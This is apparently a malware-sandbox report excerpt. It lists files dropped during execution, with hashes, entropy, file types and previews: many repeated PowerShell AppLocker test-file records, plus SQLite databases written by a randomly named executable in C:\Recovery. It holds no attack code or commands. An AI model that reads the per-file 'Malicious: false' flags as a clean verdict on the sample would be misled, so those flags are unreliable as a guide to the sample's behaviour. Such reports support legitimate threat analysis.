                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
